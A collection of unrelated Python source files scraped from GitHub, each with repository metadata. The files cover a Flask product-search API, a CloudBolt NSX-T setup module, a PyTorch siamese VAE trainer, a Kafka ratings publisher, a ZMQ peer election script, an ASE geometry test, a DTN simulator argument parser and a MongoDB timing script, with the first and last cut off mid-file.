for word in [x.lower() for x in e.split(',')[1].split('-')]:
for query_word in query.split(' '):
if query_word in word2vec_model.wv.vocab and word in word2vec_model.wv.vocab:
average_similarity += word2vec_model.similarity(query_word, word)
counter += 1
average_similarity /= (counter if counter != 0 else 1)
return occurences + average_similarity
word2vec_model = gensim.models.Word2Vec.load('../MachineLearningModels/Word2Vec/word2vec.model')
vectorizing_model = load('../MachineLearningModels/KMeansClustering/vectorizing_model.sav')
clustering_model = load('../MachineLearningModels/KMeansClustering/clustering_model.sav')
products = open('../formatted_data/all_products.txt').read().split('\n')[:-1]
@app.route('/', methods=['GET'])
def home():
parser = request.args
#parser.add_argument('query', type=str)
query = parser['query']
prediction = clustering_model.predict(vectorizing_model.transform([query]))[0]
product_terms = [vectorizing_model.get_feature_names()[product_term_index] for product_term_index in clustering_model.cluster_centers_.argsort()[:, ::-1][prediction, :30]]
relavant_products = products.copy()
relavant_products.sort(key=partial(k_means_sort, product_terms=product_terms, query=query), reverse=True)
return jsonify(relavant_products[:10])
#return "Distant Reading Archive: This site is a prototype API for distant reading of science fiction novels."
app.run() | themorlock/SearchMart | RestAPI/api.py | api.py | py | 2,142 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "gensim.models.Word2Vec.load",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "gensim.models",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "joblib.loa... |
35990658808 | """
This module is used to store the methods for setting up the NSX-T XUI
"""
import json
import os
from os import path
from packaging import version
from cbhooks.models import CloudBoltHook
from servicecatalog.models import ServiceBlueprint
from resourcehandlers.models import ResourceHandler
from xui.nsxt.xui_utilities import check_for_nsxt, setup_nsx_tags
from django.utils.text import slugify
from utilities.logger import ThreadLogger
logger = ThreadLogger(__name__)
XUI_PATH = path.dirname(path.abspath(__file__))
XUI_NAME = XUI_PATH.split("/")[-1]
CONFIG_FILE = '/var/opt/cloudbolt/proserv/xui/xui_versions.json'
def get_data_from_config_file(property_key):
with open(CONFIG_FILE, 'r') as f:
config = json.load(f)
data = config[XUI_NAME][property_key]
return data
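# Illustrative shape of xui_versions.json, inferred from run_config below
# (not an official schema; version string invented):
#
# {
#     "nsxt": {
#         "current_version": "1.0.0",
#         "SET_ACTIONS_TO_REMOTE_SOURCE": true,
#         "OVERWRITE_EXISTING_BLUEPRINTS": true
#     }
# }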
# If we find a Blueprint with the same name, should it be overwritten?
try:
OVERWRITE_EXISTING_BLUEPRINTS = get_data_from_config_file(
'OVERWRITE_EXISTING_BLUEPRINTS')
except Exception:
OVERWRITE_EXISTING_BLUEPRINTS = True
# From what I can tell, when a Blueprint is using a remote source, the actions
# are only updated at initial creation. Setting this toggle to True would
# set each action to use the remote source - forcing update of the actions when
# the XUI gets updated
try:
SET_ACTIONS_TO_REMOTE_SOURCE = get_data_from_config_file(
'SET_ACTIONS_TO_REMOTE_SOURCE')
except Exception:
SET_ACTIONS_TO_REMOTE_SOURCE = True
def run_config(xui_version):
config_needed = False
try:
with open(CONFIG_FILE, 'r') as f:
config = json.load(f)
current_version = config[XUI_NAME]["current_version"]
if version.parse(current_version) < version.parse(xui_version):
logger.info(f"Current Version: {current_version} is less than"
f" {xui_version}. Running config.")
config_needed = True
except Exception:
logger.info(f"Config file not found going to run configuration")
config_needed = True
if config_needed:
logger.info("Running Configuration")
configure_xui()
try:
config
except NameError:
config = {}
config[XUI_NAME] = {
"current_version": xui_version,
"SET_ACTIONS_TO_REMOTE_SOURCE": SET_ACTIONS_TO_REMOTE_SOURCE,
"OVERWRITE_EXISTING_BLUEPRINTS": OVERWRITE_EXISTING_BLUEPRINTS
}
with open(CONFIG_FILE, 'w') as f:
json.dump(config, f, indent=4)
def configure_xui():
configure_tags()
configure_blueprints()
def configure_blueprints():
blueprints_dir = f'{XUI_PATH}/blueprints/'
for bp in os.listdir(blueprints_dir):
bp_dir = f'{blueprints_dir}{bp}/'
bp_path = f'{bp_dir}{bp}.json'
with open(bp_path, 'r') as f:
bp_json = json.load(f)
bp_name = bp_json["name"]
try:
bp_global_id = bp_json["id"]
except KeyError:
logger.warning(f"Blueprint: {bp_name} does not have an id. "
f"Skipping")
continue
bp, created = ServiceBlueprint.objects.get_or_create(
global_id=bp_global_id,
status='ACTIVE'
)
if not created:
if OVERWRITE_EXISTING_BLUEPRINTS:
logger.info(f"Overwriting Blueprint: {bp_name}")
else:
logger.info(f"Blueprint: {bp_name} already exists. Skipping")
continue
bp.remote_source_url = f'file://{bp_path}'
bp.save()
bp.refresh_from_remote_source()
logger.info(f"Finished refreshing: {bp_name} from remote source")
set_actions_to_remote_source(bp_dir, bp_json, created)
def set_actions_to_remote_source(bp_dir, bp_json, created):
if SET_ACTIONS_TO_REMOTE_SOURCE or created:
logger.info(f'Starting to set actions to remote source for BP: '
f'{bp_json["name"]}')
action_datas = [] # Tuples of (action_name, action_path)
elements = ["teardown_items", "deployment_items", "management_actions"]
for element in elements:
for action in bp_json[element]:
action_data = get_action_data(action, bp_dir, element)
action_datas.append(action_data)
for action_data in action_datas:
action_name, action_path = action_data
logger.info(f"Setting action: {action_name} to remote source")
set_action_to_remote_source(action_name, action_path)
else:
logger.info("Not setting actions to remote source. Update the "
"SET_ACTIONS_TO_REMOTE_SOURCE variable to True if you "
"want to do this")
return None
def set_action_to_remote_source(action_name, action_path):
try:
action = CloudBoltHook.objects.get(name=action_name)
action.source_code_url = f'file://{action_path}'
action.save()
    except CloudBoltHook.DoesNotExist:
logger.warning(f"Could not find action: {action_name}, will not be "
f"able to set to remote source")
def get_action_data(action, bp_dir, item_name):
if item_name == 'management_actions':
file_name = slugify(action["label"]).replace("-", "_")
json_file = f'{file_name}.json'
json_path = f'{bp_dir}{file_name}/{file_name}/{json_file}'
action_name = action["label"]
else:
file_name = slugify(action["name"]).replace("-", "_")
json_file = f'{file_name}.json'
json_path = f'{bp_dir}{file_name}/{file_name}.json'
action_name = action["name"]
action_path = get_action_path_from_json(json_path, json_file)
return action_name, action_path
def get_action_path_from_json(json_path, json_file):
with open(json_path, 'r') as f:
action_json = json.load(f)
action_file = action_json["script_filename"]
action_path = json_path.replace(json_file, action_file)
return action_path
def configure_tags():
# Create the nsxt_tag parameter if it does not already exist
cf, _ = setup_nsx_tags()
# Add an NSXT parameter to any NSXT environments
rhs = ResourceHandler.objects.all()
for rh in rhs:
if check_for_nsxt(rh):
for env in rh.environment_set.all():
env.custom_fields.add(cf)
| mbomb67/cloudbolt_samples | cloudbolt_content/ui-extension-packages/nsxt/config.py | config.py | py | 6,538 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "utilities.logger.ThreadLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "os.path.abspath... |
26597485464 | import pdb, argparse
import numpy as np
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision as thv
from torchvision import transforms
from torch.utils.data import Dataset, DataLoader
from CarlaDataset import CarlaDataset
from CVAE import CVAE
from siameseCVAE import siameseCVAE
def main():
model = siameseCVAE()
criterion = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999),
eps=1e-08, weight_decay=0)
epochs = 10
dl = DataLoader(CarlaDataset('../data/'))
for epoch in range(epochs):
for i, X in enumerate(dl):
img = X[0]
img_ = X[1]
ctrl_inputs = X[2]
img = (img/255).float()
img_ = (img_/255).float()
img1 = img[:,0,:,:,:]
img2 = img[:,1,:,:,:]
img1_ = img_[:,0,:,:,:]
img2_ = img_[:,1,:,:,:]
xhat, yhat, z, z_mean, z_stdev = model.forward(img1,img2,ctrl_inputs)
lossx = criterion(xhat,img1_)
lossy = criterion(yhat,img2_)
            optimizer.zero_grad()
            loss = lossx + lossy
            loss.backward()
            optimizer.step()  # was missing: without it the weights are never updated
            if (i+1) % 10 == 0:
                print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch+1, epochs, i+1, len(dl), loss.item()))
            pdb.set_trace()  # debugging breakpoint kept from the original; pauses after every batch
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Siamese CVAE training on CARLA data')
parser.add_argument('--batch_size', type=int, default=32)
# parser.add_argument('--lr', type=int, default=0.005)
args = parser.parse_args()
main() | klaywittler/latent-map-planning | model/train_siamese.py | train_siamese.py | py | 1,675 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "siameseCVAE.siameseCVAE",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.nn.MSELoss",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "torch.optim.Adam",
... |
70028298274 | #!/bin/python
import argparse
import numpy as np
import pandas as pd
import time
import json
from datetime import datetime, timedelta
from confluent_kafka import avro
from confluent_kafka.avro import AvroProducer
def parse_args():
parser = argparse.ArgumentParser(description='Publish CSV records to a Kafka topic.')
parser.add_argument('--delta-minutes', '-d', default=2, type=int, help='Minutes to shift timestamps')
parser.add_argument('--input-file', '-i', default='../resources/ml-latest-small/ratings.csv',
help='Path to the CSV input file')
parser.add_argument('--output-topic', '-o', default='user-ratings-4', help='Output Kafka topic')
return parser.parse_args()
def transform_timestamps(df, start_time_adjusted, end_time_adjusted):
start_time_adjusted_ts = int(start_time_adjusted.timestamp() * 1000)
end_time_adjusted_ts = int(end_time_adjusted.timestamp() * 1000)
# Generate random timestamps within the time range
random_timestamps = np.random.randint(start_time_adjusted_ts, end_time_adjusted_ts, df.shape[0])
# Sort the random timestamps
sorted_timestamps = np.sort(random_timestamps)
# Assign sorted random timestamps to the DataFrame
df['timestamp'] = sorted_timestamps
return df
def setup_producer():
# Avro schema
# key schema not used due to streams dependency confusing key and value schemas
key_schema_str = json.dumps({
"namespace": "ratings",
"type": "record",
"name": "UserID",
"fields": [
{"name": "userId", "type": "int"}
]
})
value_schema_str = json.dumps({
"namespace": "ratings",
"type": "record",
"name": "Rating",
"fields": [
{"name": "userId", "type": "int"},
{"name": "movieId", "type": "int"},
{"name": "rating", "type": "float"},
{
"name": "timestamp",
"type": {
"type": "long",
"logicalType": "timestamp-millis"
}
}
]
})
# Producer configuration
    producer = AvroProducer({
        'bootstrap.servers': 'localhost:9092',
        'schema.registry.url': 'http://localhost:8081'
    }, default_value_schema=avro.loads(value_schema_str))  # AvroProducer expects a parsed schema, not a raw JSON string
# }, default_value_schema=value_schema_str, default_key_schema=key_schema_str)
return producer
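# Hedged example of a value dict matching the Avro schema above (numbers invented):
#
#     {"userId": 1, "movieId": 318, "rating": 4.5, "timestamp": 1700000000000}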
def send_batch(producer, batch, output_topic):
for value in batch:
producer.produce(
topic=output_topic,
# key=dict(userId=value['userId']),
value=value
)
def manage_loop(df, producer, output_topic):
total_count = df.shape[0]
record_count = 0
while not df.empty:
current_utc_ts = int(datetime.utcnow().timestamp() * 1000) # Convert this to UNIX milliseconds as well
past_rows = df[df['timestamp'] <= current_utc_ts]
if not past_rows.empty:
batch = past_rows.to_dict('records')
send_batch(producer, batch, output_topic)
batch_count = len(batch)
record_count += batch_count
current_time_str = datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")
print(f"{current_time_str} - {batch_count} rows sent ({record_count}/{total_count})")
df = df[df['timestamp'] > current_utc_ts]
producer.flush()
time.sleep(1)
def main():
args = parse_args()
df = pd.read_csv(args.input_file)
start_time_adjusted = datetime.utcnow()
end_time_adjusted = start_time_adjusted + timedelta(minutes=args.delta_minutes)
df = transform_timestamps(df, start_time_adjusted, end_time_adjusted)
producer = setup_producer()
print(f"Started publishing records at {start_time_adjusted}")
manage_loop(df, producer, args.output_topic)
print(f"Finished publishing records at {datetime.utcnow()}")
if __name__ == "__main__":
main()
| brunoribeiro2k/movielens-events | src/main/python/publish-ratings.py | publish-ratings.py | py | 3,929 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.random.randint",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "numpy.... |
132504097 | import random
import sys
import threading
import time
from multiprocessing import Process
import zmq
import requests
from Crypto.Hash import SHA3_256
from Crypto.PublicKey import ECC
from Crypto.Signature import DSS
from Pyro4.util import json
n = int(sys.argv[2])
t = int(sys.argv[4])
endpoint = "http://localhost:5000/peers"
def peer_func(id):
mutex = threading.Lock()
ID = id
MyPORT = random.randrange(1300, 60000)
sign_key = ECC.generate(curve='NIST P-256')
verify_key = sign_key.public_key()
peer = {
"id": ID,
"port": MyPORT,
"public_key": verify_key.export_key(format='OpenSSH'),
"random_numbers_list": []}
res = requests.post(endpoint, json=peer)
peer["list"] = requests.get(endpoint).json()
peer["random_number"] = random.getrandbits(256)
ports = []
messages = []
for i in range(n):
ports.append(peer["list"][i]["port"])
context = zmq.Context()
num_sender = context.socket(zmq.PUB)
num_sender.bind("tcp://127.0.0.1:" + str(MyPORT))
time.sleep(1)
contexts = []
for k in range(n):
context2 = zmq.Context()
num_receiver = context2.socket(zmq.SUB)
num_receiver.connect("tcp://127.0.0.1:" + str(ports[(id + k) % n]))
time.sleep(0.5)
num_receiver.subscribe("")
contexts.append(num_receiver)
time.sleep(1)
num_sender.send_string(str(peer["random_number"]))
for k in range(n):
res = int(contexts[k].recv_string())
messages.append(res)
selection = 0
for message in messages:
selection = selection ^ message
time.sleep(0.01)
d = SHA3_256.new(selection.to_bytes(32, byteorder='big'))
for k in range(t - 1):
d = SHA3_256.new(d.digest())
selection = int.from_bytes(d.digest(), "big") % n
file = ""
for message in messages:
file += str(message) + "\n"
file += str(selection) + "\n"
time.sleep(1)
signer = DSS.new(sign_key, 'fips-186-3')
h = SHA3_256.new(file.encode('utf-8'))
signature = signer.sign(h)
file += str(int.from_bytes(signature, "big")) + "\n"
file += verify_key.export_key(format='OpenSSH')
time.sleep(1)
file_writer = open("sample_election_" + str(id) + ".log", "w")
file_writer.write(file)
file_writer.close()
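def _example_leader_selection():
    # Hedged illustration, not part of the original protocol: how the XOR of all
    # random contributions is mapped to a peer index via t chained SHA3-256
    # hashes. The contribution values are invented.
    contributions = [5, 9, 12]
    selection = 0
    for m in contributions:
        selection ^= m
    d = SHA3_256.new(selection.to_bytes(32, byteorder='big'))
    for _ in range(t - 1):
        d = SHA3_256.new(d.digest())
    return int.from_bytes(d.digest(), "big") % n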
if __name__ == "__main__":
procs = []
for i in range(n):
proc = Process(target=peer_func, args=(i,))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
| Arda-Yurdakul/CS403-Term-Project | peers2.py | peers2.py | py | 2,651 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.argv",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "threading.Lock",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"li... |
72059863395 | from esphome.components import number
from esphome.const import CONF_MAX_VALUE, CONF_MIN_VALUE, CONF_STEP
import esphome.config_validation as cv
import esphome.codegen as cg
from .. import fourheat_config_validation as fhcv
from .. import (
fourheat_ns,
CONF_DATAPOINT,
CONF_FOURHEAT_ID,
CONF_PARSER,
CONF_QUERY_DATAPOINT,
FourHeat,
get_parser_expression,
)
DEPENDENCIES = ["fourheat"]
FourHeatNumber = fourheat_ns.class_("FourHeatNumber", number.Number, cg.Component)
def validate_min_max(config):
if config[CONF_MAX_VALUE] <= config[CONF_MIN_VALUE]:
raise cv.Invalid("max_value must be greater than min_value")
return config
CONFIG_SCHEMA = cv.All(
number.number_schema(FourHeatNumber)
.extend(
{
cv.GenerateID(CONF_FOURHEAT_ID): cv.use_id(FourHeat),
cv.Required(CONF_DATAPOINT): fhcv.datapoint,
cv.Optional(CONF_QUERY_DATAPOINT): fhcv.datapoint,
cv.Optional(CONF_PARSER): cv.returning_lambda,
cv.Optional(CONF_MAX_VALUE, default=16777215.0): cv.float_,
cv.Optional(CONF_MIN_VALUE, default=-16777215.0): cv.float_,
cv.Optional(CONF_STEP, default=1): cv.positive_float,
}
)
.extend(cv.COMPONENT_SCHEMA),
validate_min_max,
)
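# note: the +/-16777215 defaults above equal 2**24 - 1, presumably the value
# range of a 3-byte 4heat datapoint.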
async def to_code(config):
var = await number.new_number(
config,
min_value=config[CONF_MIN_VALUE],
max_value=config[CONF_MAX_VALUE],
step=config[CONF_STEP]
)
await cg.register_component(var, config)
parent = await cg.get_variable(config[CONF_FOURHEAT_ID])
cg.add(var.set_fourheat_parent(parent))
cg.add(var.set_datapoint_id(config[CONF_DATAPOINT]))
if CONF_QUERY_DATAPOINT in config:
cg.add(var.set_query_datapoint_id(config[CONF_QUERY_DATAPOINT]))
if CONF_PARSER in config:
parser = await get_parser_expression(config[CONF_PARSER], int)
cg.add(var.set_parser(parser))
| leoshusar/4heat-esphome | components/fourheat/number/__init__.py | __init__.py | py | 1,960 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "esphome.components.number.Number",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "esphome.components.number",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "esphome.codegen.Component",
"line_number": 19,
"usage_type": "attribute"
... |
32100442579 | from ase import Atoms
import numpy as np
atoms = Atoms(['O', 'H', 'H'], positions=[[0., 0., 0.119262],
[0., 0.763239, -0.477047],
[0., -0.763239, -0.477047]])
# Angle no pbc
assert abs(atoms.get_angle(1, 0, 2) - 104) < 1e-3
atoms.set_cell([2, 2, 2])
# Across different pbcs
atoms.set_pbc([True, False, True])
atoms.wrap()
assert abs(atoms.get_angle(1, 0, 2, mic=True) - 104) < 1e-3
# Across all True pbc
atoms.set_pbc(True)
atoms.wrap()
assert abs(atoms.get_angle(1, 0, 2, mic=True) - 104) < 1e-3
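# note: mic=True applies the minimum image convention, so the angle is measured
# across periodic boundaries using the nearest images of the neighboring atoms
# instead of the raw wrapped coordinates.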
# Simple tetrahedron
tetra_pos = np.array([[0, 0, 0], [1, 0, 0], [.5, np.sqrt(3) * .5, 0],
[.5, np.sqrt(1/3.) * .5, np.sqrt(2/3.)]])
atoms = Atoms(['H', 'H', 'H', 'H'],
positions=tetra_pos - np.array([.2, 0, 0]))
angle = 70.5287793655
assert abs(atoms.get_dihedral(0, 1, 2, 3) - angle) < 1e-3
atoms.set_cell([3, 3, 3])
atoms.set_pbc(True)
atoms.wrap()
assert abs(atoms.get_dihedral(0, 1, 2, 3, mic=True) - angle) < 1e-3
| joliesla/Material-modelling | venv/Lib/site-packages/ase/test/atoms_angle.py | atoms_angle.py | py | 1,046 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "ase.Atoms",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 25,
... |
15201921852 | from argparse import ArgumentParser, HelpFormatter
import itertools
import sys
from pathlib import Path
# ============================================================================================================
# === DTN ARGUMENT PARSER CLASSES
# ============================================================================================================
class DtnArgumentParser(ArgumentParser):
''' Subclass of Python's native ArgumentParser that incorporates a function to display warning messages related
to the arguments.
'''
def __init__(self, *args, **kwargs):
''' Constructor simply calls ArgumentParser constructor '''
super().__init__(*args, **kwargs)
def warning(self, message):
''' Display a warning message related to one of the arguments. The format is consistent with that of errors
:param str message: Warning message to display
'''
print('{}: WARNING: {}\n'.format(self.prog, message))
def error(self, message):
print('{}: ERROR: {}\n'.format(self.prog, message))
self.print_help()
sys.exit(-1)
# ============================================================================================================
# === DTN ARGUMENT PARSE FUNCTIONS
# ============================================================================================================
def get_argument_parser():
''' Parse the command-line arguments for this program
:return DtnArgumentParser: The argument parser
'''
formatter = lambda prog: HelpFormatter(prog, max_help_position=50, width=200)
parser = DtnArgumentParser(prog='Dtn Simulator', formatter_class=formatter, description='DTN Network Simulator')
# Add required arguments for running in config file mode
parser.add_argument('-cf', '--configfile', help='configuration file path',
type=str, default=None, nargs='?')
# Add optional arguments
parser.add_argument('-v', '--validate', help='run unit tests',
action='store_true')
return parser
def dict_to_args_list(args):
argnames, argvals = zip(*args.items())
argnames = ['--' + name for name in argnames]
return itertools.chain.from_iterable(zip(argnames, argvals))
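# note: e.g. dict_to_args_list({'configfile': 'sim.yaml'}) yields the flat
# sequence ('--configfile', 'sim.yaml'); 'sim.yaml' is only an illustrative name.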
def process_arguments(args=None):
''' Process the arguments of the application, parsing either the command line or an equivalent dictionary
:param args: None to parse sys.argv, or a dict mapping option names to their values
'''
# Get argument parser
parser = get_argument_parser()
# If no arguments provided, use argument parser
if not args:
args = parser.parse_args()
elif isinstance(args, dict):
args = parser.parse_args(dict_to_args_list(args))
else:
raise RuntimeError('process_arguments: args can only be None or a dictionary')
if not args.configfile: return args
# Check the validity of the configuration file
configfile = Path(args.configfile)
if not configfile.exists():
raise FileExistsError(f'Configuration file {configfile} does not exist')
if configfile.suffix not in ['.yaml', '.yml']:
raise ValueError(f'The configuration file {configfile} is not a YAML file')
return args
| msancheznet/dtnsim | simulator/utils/DtnArgumentParser.py | DtnArgumentParser.py | py | 3,255 | python | en | code | 9 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "sys.exit",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "argparse.HelpFormatter",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "itertools.cha... |
41617267146 | """ Assignment 6 performance of Mango
"""
from ast import stmt
from pathlib import Path
import csv
import pathlib
from timeit import repeat, timeit as timer
import main
import users
import user_status
import pymongo
import pandas as pd
import random
import string
import time
import socialnetwork_model
letters = string.ascii_lowercase
# from pymongo import MongoClient
# from pymongo.errors import DuplicateKeyError
def add_random_users():
for n in range(500):
new_user_id = ''.join(random.choice(letters) for i in range(10))
add_user(new_user_id,"email","name","lastname",user_collection)
def add_random_status():
"""
Add 1000 status records with random IDs from status_updates.csv.
"""
cdw = pathlib.Path.cwd()
# print(f"Reading {filename}\npath is {cdw}")
status_header = ["STATUS_ID","USER_ID","STATUS_TEXT"]
#global tatus_header
try:
filename = "status_updates.csv"
with open(filename, mode='r') as statusfile:
reader = csv.reader(statusfile, delimiter=',')
status_header = next(reader)
count = 0
# print(status_header)
for line in reader:
new_status_id = ''.join(random.choice(letters) for i in range(10))
add = main.add_status(new_status_id,line[1],line[2],status_collection)
count += 1
if count == 1000:
break
# print("added:",line[0], line[1], line[2])
statusfile.close()
# print(f'lines counted for Status: {count}')
return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
def load_users(filename, user_collection):
"""
Load 1000 user records from the CSV into the Mongo user collection.
"""
user_header = ["USER_ID", "EMAIL", "NAME", "LASTNAME"]
cdw = pathlib.Path.cwd()
# print(f"Reading{cdw} {filename}\npath is {cdw}")
try:
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
mydb = myclient["UserAccounts"]
# mongo_docs = mydb["Users"]
usercol = mydb["UserAccounts"]
# mongo_docs =
# print("drop the database")
# usercol.drop()
# df = pd.DataFrame(list(mongo_docs))
# df.to_csv(filename, index=False)
# return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
path = Path(filename)
print(path)
return False
except OSError:
return False
count = 0
try:
with open(filename, mode='r', newline='\n') as accountsfile:
# print(accountsfile)
reader = csv.reader(accountsfile, delimiter=',')
user_header = next(reader)
# print("header", user_header)
for row in reader:
count += 1
# USER_ID,NAME,LASTNAME,EMAIL (self, user_id, email, user_name, user_last_name)
# print("row",row[0], row[1], row[2], row[3])
# print("line",row)
load = add_user(row[0], row[3], row[1], row[2], user_collection)
if count == 1000:
break
# print(f"lines counted {count}")
accountsfile.close()
return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
return False
def search_1000_status_updates(filename, status_collection):
"""
Search 1000 status records.
"""
cdw = pathlib.Path.cwd()
# print(f"Reading {filename}\npath is {cdw}")
status_header = ["STATUS_ID","USER_ID","STATUS_TEXT"]
#global tatus_header
try:
with open(filename, mode='r') as statusfile:
reader = csv.reader(statusfile, delimiter=',')
status_header = next(reader)
count = 0
# print(status_header)
for line in reader:
search = main.search_status(line[0], status_collection)
count += 1
if count == 1000:
break
# print("added:",line[0], line[1], line[2])
statusfile.close()
# print(f'lines counted for Status: {count}')
return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
return False
def delete_status_updates(filename, status_collection):
"""
Delete 1000 status records.
"""
cdw = pathlib.Path.cwd()
# print(f"Reading {filename}\npath is {cdw}")
status_header = ["STATUS_ID","USER_ID","STATUS_TEXT"]
#global tatus_header
try:
with open(filename, mode='r') as statusfile:
reader = csv.reader(statusfile, delimiter=',')
status_header = next(reader)
count = 0
# print(status_header)
for line in reader:
search = main.delete_status(line[0], status_collection)
count += 1
if count == 1000:
break
# print("added:",line[0], line[1], line[2])
# tatusfile.close()
# print(f'lines counted for Status: {count}')
return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
return False
def search_1000_users(filename, user_collection):
"""
Search 1000 user records.
"""
user_header = ["USER_ID", "EMAIL", "NAME", "LASTNAME"]
cdw = pathlib.Path.cwd()
count = 0
try:
with open(filename, mode='r', newline='\n') as accountsfile:
# print(accountsfile)
reader = csv.reader(accountsfile, delimiter=',')
user_header = next(reader)
# print("header", user_header)
for row in reader:
count += 1
# USER_ID,NAME,LASTNAME,EMAIL (self, user_id, email, user_name, user_last_name)
# print("row",row[0], row[1], row[2], row[3])
# print("line",row)
load = main.search_user(row[0], user_collection)
if count == 1000:
break
accountsfile.close()
# print(f"lines counted {count}")
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
return False
def delete_1000_users(filename, user_collection):
"""
Delete 1000 user records.
"""
user_header = ["USER_ID", "EMAIL", "NAME", "LASTNAME"]
cdw = pathlib.Path.cwd()
count = 0
try:
with open(filename, mode='r', newline='\n') as accountsfile:
# print(accountsfile)
reader = csv.reader(accountsfile, delimiter=',')
user_header = next(reader)
# print("header", user_header)
for row in reader:
count += 1
# USER_ID,NAME,LASTNAME,EMAIL (self, user_id, email, user_name, user_last_name)
# print("row",row[0], row[1], row[2], row[3])
load = main.delete_user(row[0], user_collection)
if count == 1000:
break
accountsfile.close()
# print(f"lines counted {count}")
return True
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
print(f"Current path is: {cdw} ")
return False
def init_user_collection():
'''
Creates and returns a new instance of UserCollection
'''
return users.UserCollection()
def init_status_collection():
"""
Creates and returns a new instance of UserStatusCollection
UserStatusCollection()
"""
return user_status.UserStatusCollection()
def add_user(user_id, email, user_name, user_last_name, user_collection):
"""add users with users: def add_user(self, user_id, email, user_name, user_last_name):
Creates a new instance of User and stores it in user_collection
(which is an instance of UserCollection)
"""
result = user_collection.add_user(user_id, email, user_name, user_last_name)
#print(user_id, email, user_name, user_last_name)
if result:
return True
else:
return False
def add_status(status_id, user_id, status_text, status_collection):
"""
Creates a new instance of UserStatus and stores it in
user_collection(which is an instance of UserStatusCollection)
Requirements:
- status_id cannot already exist in user_collection.
- Returns False if there are any errors (for example, if
user_collection.add_status() returns False).
- Otherwise, it returns True.
"""
status_collection = main.add_status(status_id, user_id, status_text,status_collection)
return status_collection
def load_status_updates(filename, status_collection):
"""
Add 1000 status records.
"""
try:
# myclient = pymongo.MongoClient("mongodb://localhost:27017/")
# mydb = myclient["StatusUpdates"]
# # mongo_docs = mydb["Users"]
# statuscol = mydb["StatusUpdates"]
# mongo_docs = statuscol.find({},{"_id":0})
with open(filename, mode='r') as statusfile:
reader = csv.reader(statusfile, delimiter=',')
status_header = next(reader)
count = 0
# print(status_header)
for line in reader:
#defadd_status(self, status_id, user_id, status_text):
# print(f"load {line}")
main.add_status(line[0], line[1], line[2],status_collection)
count += 1
if count == 1000:
break
# print("added:",line[0], line[1], line[2])
statusfile.close()
except FileNotFoundError:
print(f"ERROR: Couldn't find {filename}")
path = Path(filename)
print(path)
return False
except OSError:
return False
if __name__ == '__main__':
socialnetwork_model.User()
socialnetwork_model.UserStatus()
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
mydbs = myclient["StatusUpdates"]
# mongo_docs = mydb["Users"]
statusrcol = mydbs["StatusUpdates"]
statusrcol.drop()
mydb = myclient["UserAccounts"]
usercol = mydb["UserAccounts"]
usercol.drop()
socialnetwork_model.UserStatus()
status_collection = main.init_status_collection()
user_collection = main.init_user_collection()
reps = 2
luser = 'load=load_users("accounts.csv", user_collection)'
lstatus = 'load=load_status_updates("status_updates.csv",status_collection)'
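# note: timeit (imported as `timer`) runs the statement string `number` times
# inside the namespace supplied via globals() and returns the *total* elapsed
# seconds, so every figure printed below covers `reps` executions.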
time.sleep(1)
load_1000_users = timer(stmt=luser,globals=globals(),number=reps)
time.sleep(2)
load_1000_status = timer(stmt=lstatus,globals=globals(),number=reps)
# print(f"user mango load {load_1000_users}")
# print(f"Status MANGO load {load_1000_status}")
time.sleep(2)
susers = 'search_1000_users("accounts.csv", user_collection)'
sstatus = 'search_1000_status_updates("status_updates.csv",status_collection)'
search_1k_users = timer(stmt=susers,globals=globals(),number=reps)
time.sleep(1)
print(f"time to search mNGO 1000 users: , {search_1k_users}")
search_1k_updates = timer(stmt=sstatus,globals=globals(),number=reps)
